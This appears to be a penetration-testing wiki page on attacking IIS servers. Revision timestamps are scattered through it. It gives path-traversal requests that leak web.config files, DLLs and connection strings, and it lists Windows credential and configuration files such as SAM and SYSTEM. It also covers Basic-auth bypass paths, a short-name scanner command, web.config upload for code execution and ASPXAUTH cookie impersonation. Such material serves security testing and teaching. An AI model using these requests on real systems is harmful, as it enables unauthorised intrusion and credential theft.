2020-07-15 15:43:14 +00:00
# IIS - Internet Information Services
Test executable file extensions:
* asp
* aspx
* config
* php
## Internal IP Address disclosure
On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
nc -v domain.com 80
openssl s_client -connect domain.com:443
```
Response disclosing the internal IP:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
GET / HTTP/1.0
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```
## Execute .config files
2021-08-09 10:17:43 +00:00
You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config )
2020-07-15 15:43:14 +00:00
More information and techniques to exploit this vulnerability [here ](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/ )
2021-04-01 12:07:26 +00:00
## IIS Discovery Bruteforce
2020-07-15 15:43:14 +00:00
2021-03-31 10:21:23 +00:00
Download the list that I have created:
2020-07-15 15:43:14 +00:00
{% file src="../../.gitbook/assets/iisfinal.txt" %}
It was created merging the contents of the following lists:
2021-10-18 11:21:18 +00:00
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt ](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt )\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html ](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html )\
[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt ](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt )\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt ](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt )\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt ](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt )\
2020-07-15 15:43:14 +00:00
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt ](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt )
Use it without adding any extension, the files that need it have it already.
2021-04-01 12:07:26 +00:00
## Path Traversal
### Leaking source code
2021-04-01 12:55:58 +00:00
{% hint style="info" %}
2021-10-18 11:21:18 +00:00
As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.\
From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\
Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.\
2021-04-01 12:55:58 +00:00
Reference: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html ](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html )
{% endhint %}
2021-04-01 12:07:26 +00:00
As any .Net application, MVC applications have a **web.config** file, where "**assemblyIdentity**" XML tags identifies every binary file the application uses.
2021-04-01 12:55:58 +00:00
```markup
2021-04-01 12:07:26 +00:00
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
[...]
HTTP/1.1 200 OK
2021-04-01 12:55:58 +00:00
[...]
<?xml version="1.0" encoding="utf-8"?>
< configuration >
2021-04-01 12:07:26 +00:00
< configSections >
< section name = "entityFramework" type = "System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission = "false" / >
2021-04-01 12:55:58 +00:00
< / configSections >
< appSettings >
< add key = "webpages:Version" value = "3.0.0.0" / >
< add key = "webpages:Enabled" value = "false" / >
< add key = "ClientValidationEnabled" value = "true" / >
< add key = "UnobtrusiveJavaScriptEnabled" value = "true" / >
< / appSettings >
< system.web >
< authentication mode = "None" / >
< compilation debug = "true" targetFramework = "4.6.1" / >
< httpRuntime targetFramework = "4.6.1" / >
< / system.web >
< system.webServer >
< modules >
< remove name = "FormsAuthentication" / >
< / modules >
< / system.webServer >
< runtime >
< assemblyBinding xmlns = "urn:schemas-microsoft-com:asm.v1" >
< dependentAssembly >
< assemblyIdentity name = "Microsoft.Owin.Security" / >
< bindingRedirect oldVersion = "1.0.0.0-3.0.1.0" newVersion = "3.0.1.0" / >
< / dependentAssembly >
< dependentAssembly >
< assemblyIdentity name = "Microsoft.Owin.Security.OAuth" / >
< bindingRedirect oldVersion = "1.0.0.0-3.0.1.0" newVersion = "3.0.1.0" / >
< / dependentAssembly >
< dependentAssembly >
< assemblyIdentity name = "Microsoft.Owin.Security.Cookies" / >
< bindingRedirect oldVersion = "1.0.0.0-3.0.1.0" newVersion = "3.0.1.0" / >
< / dependentAssembly >
< dependentAssembly >
< assemblyIdentity name = "Microsoft.Owin" / >
< bindingRedirect oldVersion = "1.0.0.0-3.0.1.0" newVersion = "3.0.1.0" / >
< / dependentAssembly >
< dependentAssembly >
< assemblyIdentity name = "Newtonsoft.Json" culture = "neutral" / >
< bindingRedirect oldVersion = "0.0.0.0-6.0.0.0" newVersion = "6.0.0.0" / >
< / dependentAssembly >
< dependentAssembly >
< assemblyIdentity name = "System.Web.Optimization" / >
< bindingRedirect oldVersion = "1.0.0.0-1.1.0.0" newVersion = "1.1.0.0" / >
< / dependentAssembly >
< dependentAssembly >
< assemblyIdentity name = "WebGrease" / >
< bindingRedirect oldVersion = "0.0.0.0-1.5.2.14234" newVersion = "1.5.2.14234" / >
< / dependentAssembly >
< dependentAssembly >
< assemblyIdentity name = "System.Web.Helpers" / >
< bindingRedirect oldVersion = "1.0.0.0-3.0.0.0" newVersion = "3.0.0.0" / >
< / dependentAssembly >
< dependentAssembly >
< assemblyIdentity name = "System.Web.Mvc" / >
< bindingRedirect oldVersion = "1.0.0.0-5.2.3.0" newVersion = "5.2.3.0" / >
< / dependentAssembly >
< dependentAssembly >
< assemblyIdentity name = "System.Web.WebPages" / >
< bindingRedirect oldVersion = "1.0.0.0-3.0.0.0" newVersion = "3.0.0.0" / >
< / dependentAssembly >
< / assemblyBinding >
2021-04-01 12:07:26 +00:00
```
2021-04-01 12:55:58 +00:00
In the previous output you can references to several "**assemblyIdentity**". These are files that may be located inside the /bin folder. For example: ** /bin/WebGrease.dll.**
2021-04-01 12:07:26 +00:00
Other files that could be found in the root directory of a .Net application are ** /global.asax**
2021-04-01 12:55:58 +00:00
```markup
2021-04-01 12:07:26 +00:00
< %@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %>
```
And ** /connectionstrings.config**
**Note: this file contains passwords!**
```markup
< connectionStrings >
< add name = "DefaultConnection" connectionString = "Data Source=(LocalDb) \MSSQLLocalDB;AttachDbFilename [...]" providerName = "System.Data.SqlClient" />
< / connectionStrings >
```
#### Namespaces
2021-04-01 12:41:53 +00:00
In addition, .Net MVC applications are structured to define **other web.config files** , having the aim to include any declaration for specific namespaces for each set of viewpages, relieving developers to declare “@using” namespaces in every file.
2021-04-01 12:07:26 +00:00
2021-04-01 12:55:58 +00:00
```markup
2021-04-01 12:07:26 +00:00
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
[...]
HTTP/1.1 200 OK
[...]
<?xml version="1.0"?>
< configuration >
< configSections >
< sectionGroup name = "system.web.webPages.razor" type = "System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" >
< section name = "host" type = "System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission = "false" / >
< section name = "pages" type = "System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission = "false" / >
< / sectionGroup >
< / configSections >
< system.web.webPages.razor > < host factoryType = "System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" / > < pages pageBaseType = "System.Web.Mvc.WebViewPage" >
< namespaces >
< add namespace = "System.Web.Mvc" / >
< add namespace = "System.Web.Mvc.Ajax" / >
< add namespace = "System.Web.Mvc.Html" / >
< add namespace = "System.Web.Optimization" / >
< add namespace = "System.Web.Routing" / >
< add namespace = "WebApplication1" / >
```
#### Downloading DLLs
2021-10-18 11:21:18 +00:00
From a very previous response, the declaration of a **custom namespace** (since other namespaces are defaults) suggests that a DLL called "**WebApplication1**" is present in the /bin directory.
2021-04-01 12:07:26 +00:00
2021-10-18 11:21:18 +00:00
```
2021-04-01 12:07:26 +00:00
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
[...]
```
2021-08-12 11:24:41 +00:00
From the previous output, inside the /bin directory you will also be able to find the Dlls
2021-04-01 12:55:58 +00:00
* System.Web.Mvc.dll
* System.Web.Mvc.Ajax.dll
* System.Web.Mvc.Html.dll
* System.Web.Optimization.dll
* System.Web.Routing.dll
2021-04-01 12:41:53 +00:00
Let's suppose that the previous DLL is importing a namespace called **WebApplication1.Areas.Minded.** an attacker can infer that other web.config files are present in the application, in guessable/default paths as ** /area-name/Views/**, containing specific configurations that may refer to other DLL files present in the /bin folder.
2021-04-01 12:07:26 +00:00
2021-04-01 12:55:58 +00:00
```markup
2021-04-01 12:07:26 +00:00
GET /download_page?id=..%2f..%2fMinded/Views/web.config HTTP/1.1
Host: example-mvc-application.minded
[...]
2021-04-01 12:55:58 +00:00
HTTP/1.1 200 OK
[...]
<?xml version="1.0"?>
< configuration >
< configSections >
< sectionGroup name = "system.web.webPages.razor" type = "System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" >
< section name = "host" type = "System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission = "false" / >
< section name = "pages" type = "System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral” requirePermission=" false " / >
< / sectionGroup >
< / configSections >
< system.web.webPages.razor > < host factoryType = "System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" / >
< pages pageBaseType = "System.Web.Mvc.WebViewPage" >
< namespaces >
< add namespace = "System.Web.Mvc" / >
< add namespace = "System.Web.Mvc.Ajax" / >
< add namespace = "System.Web.Mvc.Html" / >
< add namespace = "System.Web.Routing" / >
< add namespace = "System.Web.Optimization" / >
< add namespace = "WebApplication1" / >
< add namespace = "WebApplication1.AdditionalFeatures" / >
< / namespaces >
2021-04-01 12:07:26 +00:00
```
2021-04-01 12:55:58 +00:00
Note how in the previous output you can see a new namespace called: **WebApplication1.AdditionalFeatures** which indicates that there is another Dll in the /bin folder called **WebApplication1.AdditionalFeatures.dll**
2021-08-12 11:24:41 +00:00
### Common files
2020-07-15 15:43:14 +00:00
From [here ](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ )
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```
2021-04-01 12:07:26 +00:00
## HTTPAPI 2.0 404 Error
2021-04-01 11:45:00 +00:00
If you see an error like the following one:
2021-10-18 11:21:18 +00:00
 ( 1 ) ( 2 ) ( 2 ) ( 3 ) ( 3 ) ( 2 ) . png > )
2021-04-01 11:45:00 +00:00
2021-10-18 11:21:18 +00:00
It means that the server **didn't receive the correct domain name** inside the Host header.\
2021-04-01 11:45:00 +00:00
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
2020-07-15 15:43:14 +00:00
## Old IIS vulnerabilities worth looking for
2021-10-18 11:21:18 +00:00
### Microsoft IIS tilde character “\~” Vulnerability/Feature –
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique** .\
2020-07-15 15:43:14 +00:00
The main limitation of this technique if the server is vulnerable is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files.
You can use [https://github.com/irsdl/IIS-ShortName-Scanner ](https://github.com/irsdl/IIS-ShortName-Scanner ) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
2021-10-18 11:21:18 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf ](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf )
2020-07-15 15:43:14 +00:00
You can also use **metasploit** : `use scanner/http/iis_shortname_scanner`
### Basic Authentication bypass
2021-10-18 11:21:18 +00:00
**Bypass** a Baisc authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php`
2020-07-15 15:43:14 +00:00
You can try to **mix** this **vulnerability** and the last one to find new **folders** and **bypass** the authentication.
2021-03-30 10:27:03 +00:00
## ASP.NET Trace.AXD enabled debugging
ASP.NET include a debugging mode and its file is called `trace.axd` .
It keeps a very detailed log of all requests made to an application over a period of time.
This information includes remote client IP's, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.
2021-03-31 10:21:23 +00:00
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/ ](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/ )
2021-03-30 10:27:03 +00:00
2021-03-31 10:21:23 +00:00
2021-05-02 09:50:46 +00:00
## ASPXAUTH Cookie
ASPXAUTH uses the following info:
2021-10-18 11:21:18 +00:00
* **`validationKey`** (string): hex-encoded key to use for signature validation.
* **`decryptionMethod`** (string): (default “AES”).
* **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros).
* **`decryptionKey`** (string): hex-encoded key to use for decryption.
2021-05-02 09:50:46 +00:00
2021-10-18 11:21:18 +00:00
However, some people will use the **default values** of these parameters and will use as **cookie the email of the user** . Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to us**e the cookie from the second server in the first one** and impersonate the user.\
2021-05-02 09:50:46 +00:00
This attacked worked in this [**writeup** ](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19 ).
